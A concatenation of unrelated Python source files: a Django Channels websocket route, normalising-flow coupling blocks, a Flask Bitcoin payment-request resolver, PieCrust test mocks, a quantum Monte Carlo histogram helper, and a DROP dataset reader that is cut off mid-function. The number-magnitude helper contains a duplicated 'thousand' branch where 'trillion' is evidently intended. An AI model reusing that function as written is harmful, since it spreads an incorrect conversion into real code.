websocket_urlPattern=[
path('ws/jarvis/',consumers.botConsumer.as_asgi()),
]
application=ProtocolTypeRouter({
# 'http':
'websocket':AuthMiddlewareStack(URLRouter(websocket_urlPattern))
}) |
from enum import Enum
from torch import nn as nn
from daain.model.normalising_flow.coupling_blocks.attention_blocks import ApplyModuleOnSplit
from daain.model.normalising_flow.coupling_blocks.attention_blocks.fixed_distance_attention import (
FixedDistanceAttention,
)
from daain.model.normalising_flow.coupling_blocks.attention_blocks.self_attention import (
SelfAttentionLayerSAGAN,
)
class CouplingBlockType(Enum):
GLOW_1x1_CONV = "glow_1x1_conv"
GLOW_1x1_CONV_v2 = "glow_1x1_conv_v2"
GLOW_DEPTH_CONV = "glow_depth_conv"
GLOW_ATTENTION = "glow_attention"
GLOW_LINEAR = "glow_linear"
GLOW_POS_ATTENTION = "glow_positional_attention"
IRESNET = "iresnet"
RNVP_1x1_CONV = "rnvp_1x1_conv"
GIN_LINEAR = "gin_linear"
CONDITIONAL = "conditional"
GLOW_1x1_CONV_GIN = "glow_1x1_conv_gin"
def is_1d(self):
return self in [
CouplingBlockType.GLOW_LINEAR,
CouplingBlockType.GLOW_POS_ATTENTION,
CouplingBlockType.CONDITIONAL,
CouplingBlockType.GIN_LINEAR,
]
def use_permutation_layer(self):
# the GLOW_POS_ATTENTION adds the coordinates to the data as additional channels. the permutation is thus
# done a bit differently for these type of models.
return self not in [CouplingBlockType.GLOW_POS_ATTENTION]
def use_cuda(self):
return not self == CouplingBlockType.GLOW_LINEAR
def min_factor_to_be_larger(a, b):
f = 1
while f * a < b:
f += 1
return f, f * a
def subnet_linear(c_in, c_out):
return nn.Sequential(nn.Linear(c_in, min(c_in, c_out // 2)), nn.ReLU(), nn.Linear(min(c_in, c_out // 2), c_out),)
def subnet_fc(c_in, c_out):
return nn.Sequential(nn.Linear(c_in, 10), nn.ReLU(), nn.Linear(10, c_out))
def subnet_conv_1x1(c_in, c_out):
# TODO adjust this according to the input size, should always be larger than the given input
return nn.Sequential(nn.Conv2d(c_in, 256, 1), nn.ReLU(), nn.Conv2d(256, c_out, 1))
# def subnet_conv_1x1_v2(c_in, c_out, num_channels):
# return nn.Sequential(nn.Conv2d(c_in, c_out, kernel_size=1), nn.ReLU())
def subnet_depth_conv(c_in, c_out, num_channels):
k, out_depth = min_factor_to_be_larger(c_in, c_out)
return nn.Sequential(
nn.Conv2d(c_in, out_depth, 3, groups=c_in, padding=1), nn.ReLU(), nn.Conv2d(out_depth, c_out, 3, padding=1)
)
def subnet_attention(c_in, c_out, n_attention_blocks=3):
return nn.Sequential(
*[SelfAttentionLayerSAGAN(c_in) for _ in range(n_attention_blocks)],
# nn.ReLU(),
nn.Conv2d(c_in, c_out, 1), # to bring it up to the required dimension
nn.BatchNorm2d(c_out)
)
def subnet_dist_attention(c_in, c_out, pairwise_distances):
return nn.Sequential(
FixedDistanceAttention(pairwise_distances=pairwise_distances),
ApplyModuleOnSplit(nn.Linear(c_in, c_out)),
ApplyModuleOnSplit(nn.ReLU()),
)
|
__author__ = 'mdavid'
from flask import request, Response
from redis import Redis
from addressimo.blockchain import cache_up_to_date
from addressimo.config import config
from addressimo.crypto import generate_bip32_address_from_extended_pubkey, generate_payment_request, get_unused_presigned_payment_request, derive_branch
from addressimo.signer.LocalSigner import LocalSigner
from addressimo.plugin import PluginManager
from addressimo.util import create_json_response, create_bip72_response
from addressimo.util import LogUtil, requires_valid_signature
log = LogUtil.setup_logging()
redis_conn = Redis.from_url(config.redis_addr_cache_uri)
# Constants
PR_MIMETYPE = 'application/bitcoin-paymentrequest'
def resolve(id):
###################################
# Verify Resolver and Request Data
###################################
if not cache_up_to_date():
log.critical('Address cache not up to date. Refresh Redis cache.')
return create_json_response(False, 'Address cache not up to date. Please try again later.', 500)
try:
id_obj = PluginManager.get_plugin('RESOLVER', config.resolver_type).get_id_obj(id)
except Exception as e:
log.error('Exception retrieving id_obj [ID: %s | Exception: %s]' % (id, str(e)))
return create_json_response(False, 'Exception occurred when retrieving id_obj from database', 500)
if not id_obj:
log.error('Unable to retrieve id_obj [ID: %s]' % id)
return create_json_response(False, 'Unable to retrieve id_obj from database', 404)
#################################################################################
# Determine Wallet Address to Return or Use in BIP70 PaymentRequest Generation
#################################################################################
if not id_obj.bip32_enabled and not id_obj.wallet_address:
log.error('bip32_enabled is False and static wallet_address is missing [ID: %s]' % id)
return create_json_response(False, 'Unable to retrieve wallet_address', 400)
if id_obj.bip32_enabled:
try:
waddr = get_unused_bip32_address(id_obj)
except Exception as e:
log.error('Exception occurred retrieving unused bip32 address [EXCEPTION: %s | ID: %s]' % (str(e), id))
return create_json_response(False, 'Unable to retrieve wallet_address', 500)
else:
waddr = id_obj.wallet_address
###########################
# Determine Response Type
###########################
bip70_arg = request.args.get('bip70','').lower()
# BIP70 Forced Request, but endpoint is not BIP70 capable
if bip70_arg == 'true' and not id_obj.bip70_enabled:
log.error('Required bip70_enabled value is missing or disabled [ID: %s | bip70_enabled: %s]' % (id, id_obj.get('bip70_enabled', None)))
return create_json_response(False, 'Required bip70_enabled value is missing or disabled', 400)
# BIP70-enabled Endpoint and BIP70 Request Forced or Accept-able by Client
if id_obj.bip70_enabled and (bip70_arg == 'true' or PR_MIMETYPE in request.headers.get('accept')):
# Handle Pre-signed PaymentRequests
if id_obj.presigned_payment_requests:
valid_pr = get_unused_presigned_payment_request(id_obj)
if not valid_pr:
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
return Response(response=valid_pr, status=200, content_type=PR_MIMETYPE, headers={'Content-Transfer-Encoding': 'binary', 'Access-Control-Allow-Origin': '*'})
elif id_obj.presigned_only:
log.warn('Presigned PaymentRequests list empty [ID: %s]' % id)
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
# Handle Non-Presigned PaymentRequests
log.info('Creating bip70 payment request [ADDRESS: %s | AMOUNT: %s | ID: %s]' % (waddr, get_bip70_amount(id_obj), id))
try:
return create_payment_request_response(waddr, get_bip70_amount(id_obj), id_obj)
except Exception as e:
log.error('Exception occurred creating payment request [EXCEPTION: %s | ID: %s]' % (str(e), id_obj.id))
return create_json_response(False, 'Unable to create payment request', 500)
# BIP70-enabled Endpoint, but not BIP70-specific Request
if id_obj.bip70_enabled and bip70_arg != 'false':
# Handle Pre-signed Payment Requests
if not id_obj.presigned_payment_requests and id_obj.presigned_only:
log.warn('Presigned PaymentRequests list empty [ID: %s]' % id)
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
elif id_obj.presigned_payment_requests:
valid_pr = get_unused_presigned_payment_request(id_obj)
if not valid_pr:
return create_json_response(False, 'No PaymentRequests available for this ID', 404)
return create_bip72_response(None, None, 'https://%s/resolve/%s?bip70=true' % (config.site_url, id))
# Handle Non-Presigned PaymentRequests
log.info('Returning BIP72 URI [Address: %s | ID: %s]' % (waddr, id))
return create_bip72_response(waddr, get_bip70_amount(id_obj), 'https://%s/resolve/%s?bip70=true&amount=%s' % (config.site_url, id_obj.id, get_bip70_amount(id_obj)))
# Return Standard BIP72 URI Response without a PaymentRequest URI
log.info('Returning Wallet Address [Address: %s | ID: %s]' % (waddr, id))
return create_bip72_response(waddr, 0)
def get_bip70_amount(id_obj):
if id_obj.bip70_static_amount is not None:
return id_obj.bip70_static_amount
elif request.args.get('amount'):
return int(request.args.get('amount'))
return 0
def get_unused_bip32_address(id_obj):
if not id_obj.master_public_key:
raise ValueError('Master public key missing. Unable to generate bip32 address.')
# Determine correct branch based on derive logic
branch = derive_branch()
# Get last generated index for the branch if it exists.
lg_index = PluginManager.get_plugin('RESOLVER', config.resolver_type).get_lg_index(id_obj.id, branch)
while True:
wallet_addr = generate_bip32_address_from_extended_pubkey(id_obj.master_public_key, branch, lg_index)
if not redis_conn.get(wallet_addr):
log.info('New Wallet Address created [Address: %s | Branch: %s | GenIndex: %s]' % (wallet_addr, branch, lg_index))
PluginManager.get_plugin('RESOLVER', config.resolver_type).set_lg_index(id_obj.id, branch, lg_index)
return wallet_addr
else:
log.debug('Used Wallet Address found! Trying next index [Branch: %s | GenIndex: %s]' % (branch, lg_index))
lg_index += 1
def create_payment_request_response(wallet_addr, amount, id_obj):
# TODO: This might not work with remote keys
if not id_obj.x509_cert:
raise ValueError('id_obj missing x509_cert')
signer = PluginManager.get_plugin('SIGNER', config.signer_type)
signer.set_id_obj(id_obj)
# Setup PaymentRequest
pr = generate_payment_request(
wallet_addr,
id_obj.x509_cert,
signer,
amount,
id_obj.expires,
id_obj.memo,
id_obj.payment_url,
id_obj.merchant_data
)
return Response(response=pr, status=200, content_type=PR_MIMETYPE, headers={'Content-Transfer-Encoding': 'binary', 'Access-Control-Allow-Origin': '*'})
@requires_valid_signature
def return_used_branches(id):
if not config.admin_public_key:
log.info('No key provided in config, Failing [ID: %s]' % id)
return create_json_response(False, 'ID Not Recognized', 404)
if request.headers.get('x-identity') == config.admin_public_key:
return create_json_response(data={'branches': PluginManager.get_plugin('RESOLVER', config.resolver_type).get_branches(id)})
return create_json_response(False, 'ID Not Recognized', 404)
def create_wallet_address_response(wallet_addr):
return create_json_response(data={'wallet_address': wallet_addr}) |
import mock
from piecrust.app import PieCrust
from piecrust.appconfig import PieCrustConfiguration
def get_mock_app(config=None):
app = mock.MagicMock(spec=PieCrust)
app.config = PieCrustConfiguration(values={})
return app
def get_simple_content_item(app, slug):
src = app.getSource('pages')
assert src is not None
item = src.findContentFromRoute({'slug': slug})
assert item is not None
return item
def get_simple_page(app, slug):
src = app.getSource('pages')
item = get_simple_content_item(app, slug)
return app.getPage(src, item)
from .tmpfs import ( # NOQA
TempDirFileSystem as mock_fs,
TempDirScope as mock_fs_scope)
|
from numpy import *
import random
import numpy
##import pylab
from math import *
def dist(x,y):
return sqrt(numpy.dot(x-y,x-y))
class Histogram:
min=0.0
max=5.0
delta=0.05
numSamples=0
bins=numpy.array([0])
def add(self,val):
if self.min<val and val<self.max:
index=int((val-self.min)/self.delta)
self.bins[index]=self.bins[index]+1
self.numSamples=self.numSamples+1
def printMe(self):
for i in range(0,len(self.bins)):
print self.min+self.delta*i,self.bins[i]/(self.numSamples+0.0)
# def plotMe(self,fileName=""):
# print "plotting"
# pylab.clf()
# self.bins=self.bins/self.numSamples
# xCoord=[self.min+self.delta*i for i in range(0,len(self.bins))]
# pylab.plot(xCoord,self.bins)
# pylab.gca().xaxis.major.formatter.set_scientific(False)
# if not(fileName==""):
# pylab.savefig(fileName)
# else:
# pylab.show()
# def plotMeNorm(self,fileName):
# print "plotting"
# pylab.clf()
# self.bins=self.bins/self.numSamples
# xCoord=numpy.array([self.min+self.delta*i for i in range(0,len(self.bins))])
# pylab.plot(xCoord,self.bins/(xCoord*xCoord+0.0001))
# pylab.gca().xaxis.major.formatter.set_scientific(False)
# pylab.savefig(fileName)
# pylab.show()
def __init__(self,min,max,numBins):
self.min=min
self.max=max
self.delta=(max-min)/(numBins+0.0)
self.bins=numpy.zeros(numBins)+0.0
numSamples=0
def LaplacianPsiOverPsi(coords,WaveFunction):
total=0.0
delta=0.0001
tempVal3=WaveFunction(coords)
for i in range(0,len(coords)):
for j in range(0,len(coords[0])):
coords[i,j]=coords[i,j]+delta
tempVal=WaveFunction(coords)
coords[i,j]=coords[i,j]-2*delta
tempVal2=WaveFunction(coords)
coords[i,j]=coords[i,j]+delta
# print ((tempVal+tempVal2)-2.0*tempVal3)/(delta*delta)
total=total+((tempVal+tempVal2)-2.0*tempVal3)/(delta*delta)
return total/tempVal3
def ZeroFunction(R,c=1.0):
return 0.0
def GetRandomUniformVec(sigma,vec):
vec[0]=2.0*sigma*(random.random()-0.5)
vec[1]=2.0*sigma*(random.random()-0.5)
vec[2]=2.0*sigma*(random.random()-0.5)
#def GetRandomUniform(sigma,ndim):
# return numpy.array([(random.random()-0.5)*2*sigma for _ in range(0,ndim)])
def SetBondLength(bondLength):
ions=numpy.zeros((2,3))+0.0
ions[0]=[-0.5*bondLength, 0.0,0.0]
ions[1]=[0.5*bondLength,0.0,0.0]
return ions
|
import json
import copy
import string
import itertools
import numpy as np
from random import choice
from decimal import Decimal
from typing import Any, Dict, List, Tuple, Callable
import collections
from collections import defaultdict
from allennlp.common.file_utils import cached_path
from allennlp.tools.squad_eval import metric_max_over_ground_truths
from allennlp.data.tokenizers import Token, Tokenizer, WordTokenizer
from allennlp.data.dataset_readers.reading_comprehension.util import IGNORED_TOKENS, STRIPPED_CHARACTERS
import torch
import bert.tokenization as tokenization
from squad.squad_utils import _get_best_indexes, get_final_text, _compute_softmax
from squad.squad_evaluate import f1_score as calculate_f1
from drop.w2n import word_to_num
from drop.beam_search import beam_search
from drop.drop_eval import (get_metrics as drop_em_and_f1, answer_json_to_strings)
sign_remap = {0: 0, 1: 1, 2: -1}
class DropExample(object):
def __init__(self,
qas_id,
question_tokens,
passage_tokens,
numbers_in_passage=None,
number_indices=None,
answer_type=None,
number_of_answer=None,
passage_spans=None,
question_spans=None,
add_sub_expressions=None,
counts=None,
negations=None,
answer_annotations=None
):
self.qas_id = qas_id
self.question_tokens = question_tokens
self.passage_tokens = passage_tokens
self.numbers_in_passage = numbers_in_passage
self.number_indices = number_indices
self.answer_type = answer_type
self.number_of_answer = number_of_answer
self.passage_spans = passage_spans
self.question_spans = question_spans
self.add_sub_expressions = add_sub_expressions
self.counts = counts
self.negations = negations
self.answer_annotations = answer_annotations
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", \nquestion: %s" % (" ".join(self.question_tokens))
s += ", \npassage: %s" % (" ".join(self.passage_tokens))
if self.numbers_in_passage:
s += ", \nnumbers_in_passage: {}".format(self.numbers_in_passage)
if self.number_indices:
s += ", \nnumber_indices: {}".format(self.number_indices)
if self.answer_type:
s += ", \nanswer_type: {}".format(self.answer_type)
if self.number_of_answer:
s += ", \nnumber_of_answer: {}".format(self.number_of_answer)
if self.passage_spans:
s += ", \npassage_spans: {}".format(self.passage_spans)
if self.question_spans:
s += ", \nquestion_spans: {}".format(self.question_spans)
if self.add_sub_expressions:
s += ", \nadd_sub_expressions: {}".format(self.add_sub_expressions)
if self.counts:
s += ", \ncounts: {}".format(self.counts)
if self.negations:
s += ", \nnegations: {}".format(self.negations)
if self.answer_annotations:
s += ", \nanswer_annotations: {}".format(self.answer_annotations)
return s
class InputFeatures(object):
def __init__(self,
unique_id,
example_index,
tokens,
que_token_to_orig_map,
doc_token_to_orig_map,
input_ids,
input_mask,
segment_ids,
number_indices,
start_indices=None,
end_indices=None,
number_of_answers=None,
add_sub_expressions=None,
input_counts=None,
negations=None):
self.unique_id = unique_id
self.example_index = example_index
self.tokens = tokens
self.que_token_to_orig_map = que_token_to_orig_map
self.doc_token_to_orig_map = doc_token_to_orig_map
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.number_indices = number_indices
self.start_indices = start_indices
self.end_indices = end_indices
self.number_of_answers = number_of_answers
self.add_sub_expressions = add_sub_expressions
self.input_counts = input_counts
self.negations = negations
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "unique_id: %s" % (self.unique_id)
s += ", \nnumber_indices: {}".format(self.number_indices)
if self.start_indices:
s += ", \nstart_indices: {}".format(self.start_indices)
if self.end_indices:
s += ", \nend_indices: {}".format(self.end_indices)
if self.number_of_answers:
s += ", \nnumber_of_answers: {}".format(self.number_of_answers)
if self.add_sub_expressions:
s += ", \nadd_sub_expressions: {}".format(self.add_sub_expressions)
if self.input_counts:
s += ", \ninput_counts: {}".format(self.input_counts)
if self.negations:
s += ", \nnegations: {}".format(self.negations)
return s
WORD_NUMBER_MAP = {"zero": 0, "one": 1, "two": 2, "three": 3, "four": 4,
"five": 5, "six": 6, "seven": 7, "eight": 8,
"nine": 9, "ten": 10, "eleven": 11, "twelve": 12,
"thirteen": 13, "fourteen": 14, "fifteen": 15,
"sixteen": 16, "seventeen": 17, "eighteen": 18, "nineteen": 19}
def split_token_by_delimiter(token: Token, delimiter: str) -> List[Token]:
split_tokens = []
char_offset = token.idx
for sub_str in token.text.split(delimiter):
if sub_str:
split_tokens.append(Token(text=sub_str, idx=char_offset))
char_offset += len(sub_str)
split_tokens.append(Token(text=delimiter, idx=char_offset))
char_offset += len(delimiter)
if split_tokens:
split_tokens.pop(-1)
char_offset -= len(delimiter)
return split_tokens
else:
return [token]
def split_tokens_by_hyphen(tokens: List[Token]) -> List[Token]:
hyphens = ["-", "–", "~"]
new_tokens: List[Token] = []
for token in tokens:
if any(hyphen in token.text for hyphen in hyphens):
unsplit_tokens = [token]
split_tokens: List[Token] = []
for hyphen in hyphens:
for unsplit_token in unsplit_tokens:
if hyphen in token.text:
split_tokens += split_token_by_delimiter(unsplit_token, hyphen)
else:
split_tokens.append(unsplit_token)
unsplit_tokens, split_tokens = split_tokens, []
new_tokens += unsplit_tokens
else:
new_tokens.append(token)
return new_tokens
def extend_number_magnitude(number, next_token):
if next_token == "hundred":
number *= 100
elif next_token == "thousand":
number *= 1000
elif next_token == "million":
number *= 1000000
elif next_token == "billion":
number *= 1000000000
elif next_token == "thousand":
number *= 1000000000000
return number
class DropReader(object):
def __init__(self,
debug: bool = False,
tokenizer: Tokenizer = None,
include_more_numbers: bool = False,
skip_when_all_empty: List[str] = None,
max_number_of_answer: int = 8,
max_number_count: int = 10,
logger = None) -> None:
super().__init__()
self.debug = debug
self._tokenizer = tokenizer or WordTokenizer()
self.include_more_numbers = include_more_numbers
self.max_number_of_answer = max_number_of_answer
self.max_number_count = max_number_count
self.skip_when_all_empty = skip_when_all_empty if skip_when_all_empty is not None else []
for item in self.skip_when_all_empty:
assert item in ["passage_span", "question_span", "addition_subtraction", "counting", "negation"], \
f"Unsupported skip type: {item}"
self.logger = logger
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
self.logger.info("Reading file at %s", file_path)
with open(file_path) as dataset_file:
dataset = json.load(dataset_file)
examples, skip_count = [], 0
for passage_id, passage_info in dataset.items():
passage_text = passage_info["passage"]
passage_tokens = self._tokenizer.tokenize(passage_text)
passage_tokens = split_tokens_by_hyphen(passage_tokens)
for question_answer in passage_info["qa_pairs"]:
question_id = question_answer["query_id"]
question_text = question_answer["question"].strip()
answer_annotations = []
if "answer" in question_answer:
answer_annotations.append(question_answer["answer"])
if "validated_answers" in question_answer:
answer_annotations += question_answer["validated_answers"]
example = self.text_to_example(question_text, passage_text, question_id,
answer_annotations, passage_tokens)
if example is not None:
examples.append(example)
else:
skip_count += 1
if self.debug and len(examples) > 100:
break
self.logger.info(f"Skipped {skip_count} examples, kept {len(examples)} examples.")
return examples
def text_to_example(self, # type: ignore
question_text: str,
passage_text: str,
question_id: str,
answer_annotations: List[Dict] = None,
passage_tokens: List[Token] = None):
if not passage_tokens:
passage_tokens = self._tokenizer.tokenize(passage_text)
passage_tokens = split_tokens_by_hyphen(passage_tokens)
question_tokens = self._tokenizer.tokenize(question_text)
question_tokens = split_tokens_by_hyphen(question_tokens)
answer_type: str = None
answer_texts: List[str] = []
number_of_answer: int = None
if answer_annotations:
# Currently we only use the first annotated answer here, but actually this doesn't affect
# the training, because we only have one annotation for the train set.
answer_type, answer_texts = self.extract_answer_info_from_annotation(answer_annotations[0])
number_of_answer = self.max_number_of_answer if len(answer_texts) > self.max_number_of_answer else len(answer_texts)
# Tokenize the answer text in order to find the matched span based on token
tokenized_answer_texts = []
for answer_text in answer_texts:
answer_tokens = self._tokenizer.tokenize(answer_text)
answer_tokens = split_tokens_by_hyphen(answer_tokens)
tokenized_answer_texts.append(answer_tokens)
numbers_in_passage = [0]
number_indices = [-1]
for token_index, token in enumerate(passage_tokens):
number = self.convert_word_to_number(token.text, self.include_more_numbers)
if number is not None:
numbers_in_passage.append(number)
number_indices.append(token_index)
valid_passage_spans = \
self.find_valid_spans(passage_tokens, tokenized_answer_texts) if tokenized_answer_texts else []
valid_question_spans = \
self.find_valid_spans(question_tokens, tokenized_answer_texts) if tokenized_answer_texts else []
number_of_answer = None if valid_passage_spans == [] and valid_question_spans == [] else number_of_answer
target_numbers = []
# `answer_texts` is a list of valid answers.
for answer_text in answer_texts:
number = self.convert_word_to_number(answer_text, self.include_more_numbers)
if number is not None:
target_numbers.append(number)
valid_signs_for_add_sub_expressions = self.find_valid_add_sub_expressions(numbers_in_passage,
target_numbers,
max_number_of_numbers_to_consider=3)
# Currently we only support count number 0 ~ 9
numbers_for_count = list(range(self.max_number_count))
valid_counts = self.find_valid_counts(numbers_for_count, target_numbers)
valid_negations = self.find_valid_negations(numbers_in_passage, target_numbers)
type_to_answer_map = {"passage_span": valid_passage_spans,
"question_span": valid_question_spans,
"addition_subtraction": valid_signs_for_add_sub_expressions,
"counting": valid_counts,
"negation": valid_negations}
if self.skip_when_all_empty \
and not any(type_to_answer_map[skip_type] for skip_type in self.skip_when_all_empty):
return None
return DropExample(
qas_id=question_id,
question_tokens=[token.text for token in question_tokens],
passage_tokens=[token.text for token in passage_tokens],
numbers_in_passage=numbers_in_passage,
number_indices=number_indices,
answer_type=answer_type,
number_of_answer=number_of_answer,
passage_spans=valid_passage_spans,
question_spans=valid_question_spans,
add_sub_expressions=valid_signs_for_add_sub_expressions,
counts=valid_counts,
negations=valid_negations,
answer_annotations=answer_annotations)
@staticmethod
def extract_answer_info_from_annotation(answer_annotation: Dict[str, Any]) -> Tuple[str, List[str]]:
answer_type = None
if answer_annotation["spans"]:
answer_type = "spans"
elif answer_annotation["number"]:
answer_type = "number"
elif any(answer_annotation["date"].values()):
answer_type = "date"
answer_content = answer_annotation[answer_type] if answer_type is not None else None
answer_texts: List[str] = []
if answer_type is None: # No answer
pass
elif answer_type == "spans":
# answer_content is a list of string in this case
answer_texts = answer_content
elif answer_type == "date":
# answer_content is a dict with "month", "day", "year" as the keys
date_tokens = [answer_content[key]
for key in ["month", "day", "year"] if key in answer_content and answer_content[key]]
answer_texts = date_tokens
elif answer_type == "number":
# answer_content is a string of number
answer_texts = [answer_content]
return answer_type, answer_texts
@staticmethod
def convert_word_to_number(word: str, try_to_include_more_numbers=False, normalized_tokens=None, token_index=None):
"""
Currently we only support limited types of conversion.
"""
if try_to_include_more_numbers:
# strip all punctuations from the sides of the word, except for the negative sign
punctruations = string.punctuation.replace('-', '')
word = word.strip(punctruations)
# some words may contain the comma as deliminator
word = word.replace(",", "")
# word2num will convert hundred, thousand ... to number, but we skip it.
if word in ["hundred", "thousand", "million", "billion", "trillion"]:
return None
try:
number = word_to_num(word)
except ValueError:
try:
number = int(word)
except ValueError:
try:
number = float(word)
except ValueError:
number = None
if number is not None and normalized_tokens is not None and token_index is not None:
if token_index < len(normalized_tokens) - 1:
next_token = normalized_tokens[token_index + 1]
if next_token in ["hundred", "thousand", "million", "billion", "trillion"]:
number = extend_number_magnitude(number, next_token)
return number
else:
no_comma_word = word.replace(",", "")
if no_comma_word in WORD_NUMBER_MAP:
number = WORD_NUMBER_MAP[no_comma_word]
else:
try:
number = int(no_comma_word)
except ValueError:
number = None
return number
@staticmethod
def find_valid_spans(passage_tokens: List[Token],
answer_texts: List[List[Token]]) -> List[Tuple[int, int]]:
normalized_tokens = [token.text.lower().strip(STRIPPED_CHARACTERS) for token in passage_tokens]
word_positions: Dict[str, List[int]] = defaultdict(list)
for i, token in enumerate(normalized_tokens):
word_positions[token].append(i)
spans = []
for answer_text in answer_texts:
answer_tokens = [token.text.lower().strip(STRIPPED_CHARACTERS) for token in answer_text]
num_answer_tokens = len(answer_tokens)
if answer_tokens[0] not in word_positions:
continue
for span_start in word_positions[answer_tokens[0]]:
span_end = span_start # span_end is _inclusive_
answer_index = 1
while answer_index < num_answer_tokens and span_end + 1 < len(normalized_tokens):
token = normalized_tokens[span_end + 1]
if answer_tokens[answer_index].strip(STRIPPED_CHARACTERS) == token:
answer_index += 1
span_end += 1
elif token in IGNORED_TOKENS:
span_end += 1
else:
break
if num_answer_tokens == answer_index:
spans.append((span_start, span_end))
return spans
@staticmethod
def find_valid_add_sub_expressions(numbers: List[int],
targets: List[int],
max_number_of_numbers_to_consider: int = 2) -> List[List[int]]:
valid_signs_for_add_sub_expressions = []
decimal_targets = [Decimal(x).quantize(Decimal('0.00')) for x in targets]
# TODO: Try smaller numbers?'
for number_of_numbers_to_consider in range(2, max_number_of_numbers_to_consider + 1):
possible_signs = list(itertools.product((-1, 1), repeat=number_of_numbers_to_consider))
for number_combination in itertools.combinations(enumerate(numbers), number_of_numbers_to_consider):
indices = [it[0] for it in number_combination]
values = [it[1] for it in number_combination]
for signs in possible_signs:
eval_value = sum(sign * value for sign, value in zip(signs, values))
decimal_eval_value = Decimal(eval_value).quantize(Decimal('0.00'))
if decimal_eval_value in decimal_targets and min(indices) != 0:
labels_for_numbers = [0] * len(numbers) # 0 represents ``not included''.
for index, sign in zip(indices, signs):
labels_for_numbers[index] = 1 if sign == 1 else 2 # 1 for positive, 2 for negative
if labels_for_numbers not in valid_signs_for_add_sub_expressions:
valid_signs_for_add_sub_expressions.append(labels_for_numbers)
return valid_signs_for_add_sub_expressions
@staticmethod
def find_valid_negations(numbers: List[int], targets: List[int]) -> List[List[int]]:
valid_negations = []
decimal_targets = [Decimal(x).quantize(Decimal('0.00')) for x in targets]
for index, number in enumerate(numbers):
decimal_negating_number = Decimal(100 - number).quantize(Decimal('0.00'))
if number > 0 and number < 100 and decimal_negating_number in decimal_targets:
labels_for_numbers = [0] * len(numbers)
labels_for_numbers[index] = 1
valid_negations.append(labels_for_numbers)
return valid_negations
@staticmethod
def find_valid_counts(count_numbers: List[int], targets: List[int]) -> List[int]:
valid_indices = []
for index, number in enumerate(count_numbers):
if number in targets:
valid_indices.append(index)
return valid_indices
def convert_answer_spans(spans, orig_to_tok_index, all_len, all_tokens):
tok_start_positions, tok_end_positions = [], []
for span in spans:
start_position, end_position = span[0], span[1]
tok_start_position = orig_to_tok_index[start_position]
if end_position + 1 >= len(orig_to_tok_index):
tok_end_position = all_len - 1
else:
tok_end_position = orig_to_tok_index[end_position + 1] - 1
if tok_start_position < len(all_tokens) and tok_end_position < len(all_tokens):
tok_start_positions.append(tok_start_position)
tok_end_positions.append(tok_end_position)
return tok_start_positions, tok_end_positions
def convert_examples_to_features(examples, tokenizer, max_seq_length, is_train, answering_abilities=None, logger=None):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
skip_count, truncate_count = 0, 0
features = []
for (example_index, example) in enumerate(examples):
que_tok_to_orig_index = []
que_orig_to_tok_index = []
all_que_tokens = []
for (i, token) in enumerate(example.question_tokens):
que_orig_to_tok_index.append(len(all_que_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
que_tok_to_orig_index.append(i)
all_que_tokens.append(sub_token)
doc_tok_to_orig_index = []
doc_orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.passage_tokens):
doc_orig_to_tok_index.append(len(all_doc_tokens))
if i in example.number_indices:
doc_tok_to_orig_index.append(i)
all_doc_tokens.append(token)
else:
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
doc_tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
# The -3 accounts for [CLS], [SEP] and [SEP]
# Truncate the passage according to the max sequence length
max_tokens_for_doc = max_seq_length - len(all_que_tokens) - 3
all_doc_len = len(all_doc_tokens)
if all_doc_len > max_tokens_for_doc:
all_doc_tokens = all_doc_tokens[:max_tokens_for_doc]
truncate_count += 1
query_tok_start_positions, query_tok_end_positions = \
convert_answer_spans(example.question_spans, que_orig_to_tok_index, len(all_que_tokens), all_que_tokens)
passage_tok_start_positions, passage_tok_end_positions = \
convert_answer_spans(example.passage_spans, doc_orig_to_tok_index, all_doc_len, all_doc_tokens)
tok_number_indices = []
for index in example.number_indices:
if index != -1:
tok_index = doc_orig_to_tok_index[index]
if tok_index < len(all_doc_tokens):
tok_number_indices.append(tok_index)
else:
tok_number_indices.append(-1)
tokens = []
que_token_to_orig_map = {}
doc_token_to_orig_map = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for i in range(len(all_que_tokens)):
que_token_to_orig_map[len(tokens)] = que_tok_to_orig_index[i]
tokens.append(all_que_tokens[i])
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(len(all_doc_tokens)):
doc_token_to_orig_map[len(tokens)] = doc_tok_to_orig_index[i]
tokens.append(all_doc_tokens[i])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
number_indices = []
doc_offset = len(all_que_tokens) + 2
que_offset = 1
for tok_number_index in tok_number_indices:
if tok_number_index != -1:
number_index = tok_number_index + doc_offset
number_indices.append(number_index)
else:
number_indices.append(-1)
start_indices, end_indices, add_sub_expressions, input_counts, negations, number_of_answers = [], [], [], [], [], []
if is_train:
# For distant supervision, we annotate the positions of all answer spans
if passage_tok_start_positions != [] and passage_tok_end_positions !=[]:
for tok_start_position, tok_end_position in zip(passage_tok_start_positions, passage_tok_end_positions):
start_position = tok_start_position + doc_offset
end_position = tok_end_position + doc_offset
start_indices.append(start_position)
end_indices.append(end_position)
elif query_tok_start_positions != [] and query_tok_end_positions !=[]:
for tok_start_position, tok_end_position in zip(query_tok_start_positions, query_tok_end_positions):
start_position = tok_start_position + que_offset
end_position = tok_end_position + que_offset
start_indices.append(start_position)
end_indices.append(end_position)
# Weakly-supervised for addition-subtraction
if example.add_sub_expressions != []:
for add_sub_expression in example.add_sub_expressions:
# Since we have truncated the passage, the expression should also be truncated
if sum(add_sub_expression[:len(number_indices)]) >= 2:
assert len(add_sub_expression[:len(number_indices)]) == len(number_indices)
